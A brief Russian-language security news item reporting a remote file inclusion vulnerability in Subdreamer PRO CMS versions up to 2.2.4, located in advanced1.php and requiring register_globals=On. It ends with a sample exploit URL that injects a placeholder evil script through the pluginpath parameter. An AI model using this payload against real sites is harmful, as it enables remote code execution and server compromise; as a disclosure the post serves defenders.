Уязвимость и эксплойт в Subdrimer PRO v2.2.4

Сегодня были опубликованы уязвимости в популярной CMS — Sabdrimer PRO или Subdreamer PRO версий до 2.2.4. Уязвимость заключается в возможности удаленной загрузки файла. Имеет высокую степень опасности.
Найдена в файле advanced1.php. Работает только при register_globals=On.
http://www.website.com/skins/advanced/advanced1.php?pluginpath[0]=[evil_script]